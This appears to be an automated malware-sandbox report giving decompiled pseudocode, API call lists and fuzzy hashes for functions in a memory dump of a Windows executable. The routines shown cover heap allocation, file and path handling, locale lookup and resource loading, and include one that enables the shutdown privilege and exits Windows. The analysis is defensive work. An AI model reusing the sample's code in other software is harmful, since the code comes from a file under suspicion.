                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileModuleName$LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 4113206344-0
                                                                    • Opcode ID: 2301add7ea149dd4fbebfdf59b7b3942b6e3d1df22e9777a155c308e994de31e
                                                                    • Instruction ID: 1beb63cefa55d3dba2b36e2095187d50c135a0cf4330adb642bee8d6847d8901
                                                                    • Opcode Fuzzy Hash: 2301add7ea149dd4fbebfdf59b7b3942b6e3d1df22e9777a155c308e994de31e
                                                                    • Instruction Fuzzy Hash: 7BE0C971A013119BCB10DE58C8C5A4A3798AB08754F044AA6AD24DF387D3B5DD1487D5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00423ED8, Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00423ED8(intOrPtr* __eax) {
				int _t4;
				intOrPtr* _t7;

				_t7 = __eax;
				_t4 = SetEndOfFile( *(__eax + 4)); // executed
				if(_t4 == 0) {
					return E00423CAC( *_t7);
				}
				return _t4;
			}





                                                                    0x00423ed9
                                                                    0x00423edf
                                                                    0x00423ee6
                                                                    0x00000000
                                                                    0x00423eea
                                                                    0x00423ef0

                                                                    APIs
                                                                    • SetEndOfFile.KERNEL32(?,7FB80010,004B6358,00000000), ref: 00423EDF
                                                                      • Part of subcall function 00423CAC: GetLastError.KERNEL32(004237FC,00423D4F,?,?,00000000,?,004B5F76,00000001,00000000,00000002,00000000,004B659E,?,00000000,004B65E2), ref: 00423CAF
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 734332943-0
                                                                    • Opcode ID: 09339d9670a81d77462708df034512c3e9d7a5ee9c38b49a5b5d33688a33920b
                                                                    • Instruction ID: ae15968ab9cd064c61534cde2c099b4aac4a7b80231ae1acb8e6de6fcc6ca8bf
                                                                    • Opcode Fuzzy Hash: 09339d9670a81d77462708df034512c3e9d7a5ee9c38b49a5b5d33688a33920b
                                                                    • Instruction Fuzzy Hash: 58C04C61300210478B04EEBBD5C190666E85B582157414466B904DB216E67DD9158615
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040CAA4, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0040CAA4() {
				intOrPtr _v16;
				struct _SYSTEM_INFO* _t3;

				GetSystemInfo(_t3); // executed
				return _v16;
			}





                                                                    0x0040caa8
                                                                    0x0040cab4

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InfoSystem
                                                                    • String ID:
                                                                    • API String ID: 31276548-0
                                                                    • Opcode ID: 9dd1f6b5bb1b0da35443b21aa4a452d0333aba70165927044b368234b0936b7a
                                                                    • Instruction ID: 4f21eec972071caf62eebbeb90550a79e4d7a8082c8b53f17589c9beddeb5e45
                                                                    • Opcode Fuzzy Hash: 9dd1f6b5bb1b0da35443b21aa4a452d0333aba70165927044b368234b0936b7a
                                                                    • Instruction Fuzzy Hash: CDA012984088002AC404AB194C4340F39C819C1114FC40224745CB62C2E61D866403DB
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00403BCC, Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00403BCC(signed int __eax) {
				void* _t4;
				intOrPtr _t7;
				signed int _t8;
				void** _t10;
				void* _t12;
				void* _t14;

				_t8 = __eax;
				E00403B60(__eax);
				_t4 = VirtualAlloc(0, 0x13fff0, 0x1000, 4); // executed
				if(_t4 == 0) {
					 *0x4bbaf0 = 0;
					return 0;
				} else {
					_t10 =  *0x4bbadc; // 0x4bbad8
					_t14 = _t4;
					 *_t14 = 0x4bbad8;
					 *0x4bbadc = _t4;
					 *(_t14 + 4) = _t10;
					 *_t10 = _t4;
					_t12 = _t14 + 0x13fff0;
					 *((intOrPtr*)(_t12 - 4)) = 2;
					 *0x4bbaf0 = 0x13ffe0 - _t8;
					_t7 = _t12 - _t8;
					 *0x4bbaec = _t7;
					 *(_t7 - 4) = _t8 | 0x00000002;
					return _t7;
				}
			}









                                                                    0x00403bce
                                                                    0x00403bd0
                                                                    0x00403be3
                                                                    0x00403bea
                                                                    0x00403c3c
                                                                    0x00403c45
                                                                    0x00403bec
                                                                    0x00403bec
                                                                    0x00403bf2
                                                                    0x00403bf4
                                                                    0x00403bfa
                                                                    0x00403bff
                                                                    0x00403c02
                                                                    0x00403c06
                                                                    0x00403c11
                                                                    0x00403c1e
                                                                    0x00403c26
                                                                    0x00403c28
                                                                    0x00403c35
                                                                    0x00403c39
                                                                    0x00403c39

                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,000001A3,004041E3,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000), ref: 00403BE3
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: cb8f292e3956ad7a1a5e0c92f19b435d8be5366ce3ed5ca5418bf36ecf0e0e1a
                                                                    • Instruction ID: ee114c9f451a66722181258b66a673b4223530c98f306d9f720d31c7abdd50f3
                                                                    • Opcode Fuzzy Hash: cb8f292e3956ad7a1a5e0c92f19b435d8be5366ce3ed5ca5418bf36ecf0e0e1a
                                                                    • Instruction Fuzzy Hash: 71F087F2F002404FE7249F799D40742BAE8E709315B10827EE908EB799E7F488018B88
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00403CF6, Relevance: 1.3, APIs: 1, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 96%
                                                                    			E00403CF6(void* __eax) {
				struct _MEMORY_BASIC_INFORMATION _v44;
				void* _v48;
				void* _t13;
				int _t20;
				void* _t22;
				signed int _t26;
				signed int _t29;
				signed int _t30;
				void* _t34;
				intOrPtr _t35;
				signed int _t39;
				void* _t41;
				void* _t42;

				_push(_t29);
				_t42 = _t41 + 0xffffffdc;
				_t34 = __eax - 0x10;
				E00403C48();
				_t13 = _t34;
				 *_t42 =  *_t13;
				_v48 =  *((intOrPtr*)(_t13 + 4));
				_t26 =  *(_t13 + 0xc);
				if((_t26 & 0x00000008) != 0) {
					_t22 = _t34;
					_t39 = _t26 & 0xfffffff0;
					_t30 = 0;
					while(1) {
						VirtualQuery(_t22,  &_v44, 0x1c);
						if(VirtualFree(_t22, 0, 0x8000) == 0) {
							break;
						}
						_t35 = _v44.RegionSize;
						if(_t39 > _t35) {
							_t39 = _t39 - _t35;
							_t22 = _t22 + _t35;
							continue;
						}
						goto L10;
					}
					_t30 = _t30 | 0xffffffff;
				} else {
					_t20 = VirtualFree(_t34, 0, 0x8000); // executed
					if(_t20 == 0) {
						_t30 = _t29 | 0xffffffff;
					} else {
						_t30 = 0;
					}
				}
				L10:
				if(_t30 == 0) {
					 *_v48 =  *_t42;
					 *( *_t42 + 4) = _v48;
				}
				 *0x4bdb78 = 0;
				return _t30;
			}
















                                                                    0x00403cfa
                                                                    0x00403cfc
                                                                    0x00403d01
                                                                    0x00403d04
                                                                    0x00403d09
                                                                    0x00403d0d
                                                                    0x00403d13
                                                                    0x00403d17
                                                                    0x00403d1d
                                                                    0x00403d39
                                                                    0x00403d3d
                                                                    0x00403d40
                                                                    0x00403d42
                                                                    0x00403d4a
                                                                    0x00403d5e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403d65
                                                                    0x00403d6b
                                                                    0x00403d6d
                                                                    0x00403d6f
                                                                    0x00000000
                                                                    0x00403d6f
                                                                    0x00000000
                                                                    0x00403d6b
                                                                    0x00403d60
                                                                    0x00403d1f
                                                                    0x00403d27
                                                                    0x00403d2e
                                                                    0x00403d34
                                                                    0x00403d30
                                                                    0x00403d30
                                                                    0x00403d30
                                                                    0x00403d2e
                                                                    0x00403d73
                                                                    0x00403d75
                                                                    0x00403d7e
                                                                    0x00403d87
                                                                    0x00403d87
                                                                    0x00403d8a
                                                                    0x00403d9a

                                                                    APIs
                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00403D27
                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00403D4A
                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00403D57
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Virtual$Free$Query
                                                                    • String ID:
                                                                    • API String ID: 778034434-0
                                                                    • Opcode ID: 70118730a538275f8eba95c50282fe5a7e92951222106072b386c800723d93a4
                                                                    • Instruction ID: 6789628300bf7aa479fe1b8b627d7daf3441881ad106b622f2e79b23e4dc796b
                                                                    • Opcode Fuzzy Hash: 70118730a538275f8eba95c50282fe5a7e92951222106072b386c800723d93a4
                                                                    • Instruction Fuzzy Hash: C5F06D353046005FD311DF1AC844B17BBE9EFC5711F15C67AE888973A1E635DD018796
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 0040A928, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 140stringlibraryfileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 78%
                                                                    			E0040A928(short* __eax, intOrPtr __edx) {
				short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				struct _WIN32_FIND_DATAW _v612;
				short _v1134;
				signed int _t50;
				signed int _t51;
				void* _t55;
				signed int _t88;
				signed int _t89;
				intOrPtr* _t90;
				signed int _t101;
				signed int _t102;
				short* _t112;
				struct HINSTANCE__* _t113;
				short* _t115;
				short* _t116;
				void* _t117;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t113 = GetModuleHandleW(L"kernel32.dll");
				if(_t113 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t115 = _v8 + 4;
						goto L10;
					} else {
						if( *((short*)(_v8 + 2)) == 0x5c) {
							_t116 = E0040A904(_v8 + 4);
							if( *_t116 != 0) {
								_t14 = _t116 + 2; // 0x2
								_t115 = E0040A904(_t14);
								if( *_t115 != 0) {
									L10:
									_t88 = _t115 - _v8;
									_t89 = _t88 >> 1;
									if(_t88 < 0) {
										asm("adc ebx, 0x0");
									}
									_t43 = _t89 + 1;
									if(_t89 + 1 <= 0x105) {
										E0040A34C( &_v1134, _v8, _t43);
										while( *_t115 != 0) {
											_t112 = E0040A904(_t115 + 2);
											_t50 = _t112 - _t115;
											_t51 = _t50 >> 1;
											if(_t50 < 0) {
												asm("adc eax, 0x0");
											}
											if(_t51 + _t89 + 1 <= 0x105) {
												_t55 =  &_v1134 + _t89 + _t89;
												_t101 = _t112 - _t115;
												_t102 = _t101 >> 1;
												if(_t101 < 0) {
													asm("adc edx, 0x0");
												}
												E0040A34C(_t55, _t115, _t102 + 1);
												_v20 = FindFirstFileW( &_v1134,  &_v612);
												if(_v20 != 0xffffffff) {
													FindClose(_v20);
													if(lstrlenW( &(_v612.cFileName)) + _t89 + 1 + 1 <= 0x105) {
														 *((short*)(_t117 + _t89 * 2 - 0x46a)) = 0x5c;
														E0040A34C( &_v1134 + _t89 + _t89 + 2,  &(_v612.cFileName), 0x105 - _t89 - 1);
														_t89 = _t89 + lstrlenW( &(_v612.cFileName)) + 1;
														_t115 = _t112;
														continue;
													}
												}
											}
											goto L24;
										}
										E0040A34C(_v8,  &_v1134, _v12);
									}
								}
							}
						}
					}
				} else {
					_t90 = GetProcAddress(_t113, "GetLongPathNameW");
					if(_t90 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v1134);
						_push(_v8);
						if( *_t90() == 0) {
							goto L4;
						} else {
							E0040A34C(_v8,  &_v1134, _v12);
						}
					}
				}
				L24:
				return _v16;
			}






















                                                                    0x0040a934
                                                                    0x0040a937
                                                                    0x0040a93d
                                                                    0x0040a94a
                                                                    0x0040a94e
                                                                    0x0040a98d
                                                                    0x0040a994
                                                                    0x0040a9d4
                                                                    0x00000000
                                                                    0x0040a996
                                                                    0x0040a99e
                                                                    0x0040a9af
                                                                    0x0040a9b5
                                                                    0x0040a9bb
                                                                    0x0040a9c3
                                                                    0x0040a9c9
                                                                    0x0040a9d7
                                                                    0x0040a9d9
                                                                    0x0040a9dc
                                                                    0x0040a9de
                                                                    0x0040a9e0
                                                                    0x0040a9e0
                                                                    0x0040a9e3
                                                                    0x0040a9eb
                                                                    0x0040a9fc
                                                                    0x0040aac3
                                                                    0x0040aa0e
                                                                    0x0040aa12
                                                                    0x0040aa14
                                                                    0x0040aa16
                                                                    0x0040aa18
                                                                    0x0040aa18
                                                                    0x0040aa23
                                                                    0x0040aa33
                                                                    0x0040aa37
                                                                    0x0040aa39
                                                                    0x0040aa3b
                                                                    0x0040aa3d
                                                                    0x0040aa3d
                                                                    0x0040aa43
                                                                    0x0040aa5b
                                                                    0x0040aa62
                                                                    0x0040aa68
                                                                    0x0040aa84
                                                                    0x0040aa86
                                                                    0x0040aaad
                                                                    0x0040aabf
                                                                    0x0040aac1
                                                                    0x00000000
                                                                    0x0040aac1
                                                                    0x0040aa84
                                                                    0x0040aa62
                                                                    0x00000000
                                                                    0x0040aa23
                                                                    0x0040aad9
                                                                    0x0040aad9
                                                                    0x0040a9eb
                                                                    0x0040a9c9
                                                                    0x0040a9b5
                                                                    0x0040a99e
                                                                    0x0040a950
                                                                    0x0040a95b
                                                                    0x0040a95f
                                                                    0x00000000
                                                                    0x0040a961
                                                                    0x0040a961
                                                                    0x0040a96c
                                                                    0x0040a970
                                                                    0x0040a975
                                                                    0x00000000
                                                                    0x0040a977
                                                                    0x0040a983
                                                                    0x0040a983
                                                                    0x0040a975
                                                                    0x0040a95f
                                                                    0x0040aade
                                                                    0x0040aae7

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,004162BC,?,?), ref: 0040A945
                                                                    • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A956
                                                                    • FindFirstFileW.KERNEL32(?,?,kernel32.dll,004162BC,?,?), ref: 0040AA56
                                                                    • FindClose.KERNEL32(?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AA68
                                                                    • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AA74
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AAB9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                    • String ID: GetLongPathNameW$\$kernel32.dll
                                                                    • API String ID: 1930782624-3908791685
                                                                    • Opcode ID: 2e7747c66ca0daf9bf73dcf24122f514d4f35ae2d915a4be054088bbf24f0c4d
                                                                    • Instruction ID: 0568a8f2c4c85ac628058e700237ad117df8c3680498263a44950cac296231c5
                                                                    • Opcode Fuzzy Hash: 2e7747c66ca0daf9bf73dcf24122f514d4f35ae2d915a4be054088bbf24f0c4d
                                                                    • Instruction Fuzzy Hash: 7841A071B003189BCB20DE98CD85A9EB3B5AB44310F1485B69945F72C1EB7CAE51CF4A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004AF110, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42shutdownCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 91%
                                                                    			E004AF110() {
				int _v4;
				struct _TOKEN_PRIVILEGES _v16;
				void* _v20;
				int _t7;

				if(E0041FF2C() != 2) {
					L5:
					_t7 = ExitWindowsEx(2, 0);
					asm("sbb eax, eax");
					return _t7 + 1;
				}
				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v20) != 0) {
					LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v16.Privileges));
					_v16.PrivilegeCount = 1;
					_v4 = 2;
					AdjustTokenPrivileges(_v20, 0,  &_v16, 0, 0, 0);
					if(GetLastError() == 0) {
						goto L5;
					}
					return 0;
				}
				return 0;
			}







                                                                    0x004af11b
                                                                    0x004af178
                                                                    0x004af17c
                                                                    0x004af184
                                                                    0x00000000
                                                                    0x004af186
                                                                    0x004af12d
                                                                    0x004af13f
                                                                    0x004af144
                                                                    0x004af14c
                                                                    0x004af166
                                                                    0x004af172
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004af174
                                                                    0x00000000

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000028), ref: 004AF120
                                                                    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004AF126
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004AF13F
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF166
                                                                    • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF16B
                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 004AF17C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                    • String ID: SeShutdownPrivilege
                                                                    • API String ID: 107509674-3733053543
                                                                    • Opcode ID: dbd0b99069aff0d6788c9efc2bbd2c2bb6d4dae2a155ecb9c3cc528dabbfbf9f
                                                                    • Instruction ID: 15d82be9bc359c8987119149698676c325083c88dcd196a4f2f9cd1a299335ef
                                                                    • Opcode Fuzzy Hash: dbd0b99069aff0d6788c9efc2bbd2c2bb6d4dae2a155ecb9c3cc528dabbfbf9f
                                                                    • Instruction Fuzzy Hash: 75F06D70684301B5E610A6F2CD07F6B21C89B56B58FA00D3EBA84E91C2D7BDD81D42BF
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004AF9F0, Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004AF9F0() {
				struct HRSRC__* _t10;
				void* _t11;
				void* _t12;

				_t10 = FindResourceW(0, 0x2b67, 0xa);
				if(_t10 == 0) {
					E004AF834();
				}
				if(SizeofResource(0, _t10) != 0x2c) {
					E004AF834();
				}
				_t11 = LoadResource(0, _t10);
				if(_t11 == 0) {
					E004AF834();
				}
				_t12 = LockResource(_t11);
				if(_t12 == 0) {
					E004AF834();
				}
				return _t12;
			}






                                                                    0x004af9ff
                                                                    0x004afa03
                                                                    0x004afa05
                                                                    0x004afa05
                                                                    0x004afa15
                                                                    0x004afa17
                                                                    0x004afa17
                                                                    0x004afa24
                                                                    0x004afa28
                                                                    0x004afa2a
                                                                    0x004afa2a
                                                                    0x004afa35
                                                                    0x004afa39
                                                                    0x004afa3b
                                                                    0x004afa3b
                                                                    0x004afa43

                                                                    APIs
                                                                    • FindResourceW.KERNEL32(00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000,004B659E,?,00000000,004B65E2), ref: 004AF9FA
                                                                    • SizeofResource.KERNEL32(00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000,004B659E), ref: 004AFA0D
                                                                    • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000), ref: 004AFA1F
                                                                    • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002), ref: 004AFA30
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                    • String ID:
                                                                    • API String ID: 3473537107-0
                                                                    • Opcode ID: 128b44542abe6d6e0e09835f67cf23f4a4e4be27e5836866f54195567a651b81
                                                                    • Instruction ID: 8c15b2061d88d30e204a2d131290402b8da5209396f43898e5d703764eea749b
                                                                    • Opcode Fuzzy Hash: 128b44542abe6d6e0e09835f67cf23f4a4e4be27e5836866f54195567a651b81
                                                                    • Instruction Fuzzy Hash: FCE07E8074634625FA6436F718D7BAE00084B36B4DF40593FFA08A92D2EEAC8C19522E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040A4CC, Relevance: 4.6, APIs: 3, Instructions: 99COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 71%
                                                                    			E0040A4CC(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				short _v182;
				short _v352;
				char _v356;
				char _v360;
				char _v364;
				int _t58;
				signed int _t61;
				intOrPtr _t70;
				signed short _t80;
				void* _t83;
				void* _t85;
				void* _t86;

				_t77 = __edi;
				_push(__edi);
				_v356 = 0;
				_v360 = 0;
				_v364 = 0;
				_v8 = __edx;
				_t80 = __eax;
				_push(_t83);
				_push(0x40a631);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83 + 0xfffffe98;
				E00407A20(_v8);
				_t85 = _t80 -  *0x4b7a08; // 0x404
				if(_t85 >= 0) {
					_t86 = _t80 -  *0x4b7c08; // 0x7c68
					if(_t86 <= 0) {
						_t77 = 0x40;
						_v12 = 0;
						if(0x40 >= _v12) {
							do {
								_t61 = _t77 + _v12 >> 1;
								if(_t80 >=  *((intOrPtr*)(0x4b7a08 + _t61 * 8))) {
									__eflags = _t80 -  *((intOrPtr*)(0x4b7a08 + _t61 * 8));
									if(__eflags <= 0) {
										E0040A3EC( *((intOrPtr*)(0x4b7a0c + _t61 * 8)), _t61, _v8, _t77, _t80, __eflags);
									} else {
										_v12 = _t61 + 1;
										goto L8;
									}
								} else {
									_t77 = _t61 - 1;
									goto L8;
								}
								goto L9;
								L8:
							} while (_t77 >= _v12);
						}
					}
				}
				L9:
				if( *_v8 == 0 && IsValidLocale(_t80 & 0x0000ffff, 2) != 0) {
					_t58 = _t80 & 0x0000ffff;
					GetLocaleInfoW(_t58, 0x59,  &_v182, 0x55);
					GetLocaleInfoW(_t58, 0x5a,  &_v352, 0x55);
					E0040858C( &_v356, 0x55,  &_v182);
					_push(_v356);
					_push(0x40a64c);
					E0040858C( &_v360, 0x55,  &_v352);
					_push(_v360);
					_push(E0040A65C);
					E0040858C( &_v364, 0x55,  &_v182);
					_push(_v364);
					E004087C4(_v8, _t58, 5, _t77, _t80);
				}
				_pop(_t70);
				 *[fs:eax] = _t70;
				_push(E0040A638);
				return E00407A80( &_v364, 3);
			}

















                                                                    0x0040a4cc
                                                                    0x0040a4d7
                                                                    0x0040a4da
                                                                    0x0040a4e0
                                                                    0x0040a4e6
                                                                    0x0040a4ec
                                                                    0x0040a4ef
                                                                    0x0040a4f3
                                                                    0x0040a4f4
                                                                    0x0040a4f9
                                                                    0x0040a4fc
                                                                    0x0040a502
                                                                    0x0040a507
                                                                    0x0040a50e
                                                                    0x0040a510
                                                                    0x0040a517
                                                                    0x0040a519
                                                                    0x0040a520
                                                                    0x0040a526
                                                                    0x0040a528
                                                                    0x0040a52d
                                                                    0x0040a537
                                                                    0x0040a53e
                                                                    0x0040a546
                                                                    0x0040a558
                                                                    0x0040a548
                                                                    0x0040a549
                                                                    0x00000000
                                                                    0x0040a549
                                                                    0x0040a539
                                                                    0x0040a53b
                                                                    0x00000000
                                                                    0x0040a53b
                                                                    0x00000000
                                                                    0x0040a55f
                                                                    0x0040a55f
                                                                    0x0040a528
                                                                    0x0040a526
                                                                    0x0040a517
                                                                    0x0040a564
                                                                    0x0040a56a
                                                                    0x0040a58e
                                                                    0x0040a592
                                                                    0x0040a5a3
                                                                    0x0040a5b9
                                                                    0x0040a5be
                                                                    0x0040a5c4
                                                                    0x0040a5da
                                                                    0x0040a5df
                                                                    0x0040a5e5
                                                                    0x0040a5fb
                                                                    0x0040a600
                                                                    0x0040a60e
                                                                    0x0040a60e
                                                                    0x0040a615
                                                                    0x0040a618
                                                                    0x0040a61b
                                                                    0x0040a630

                                                                    APIs
                                                                    • IsValidLocale.KERNEL32(?,00000002,00000000,0040A631,?,004162BC,?,00000000), ref: 0040A576
                                                                    • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,0040A631,?,004162BC,?,00000000), ref: 0040A592
                                                                    • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,0040A631,?,004162BC,?,00000000), ref: 0040A5A3
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
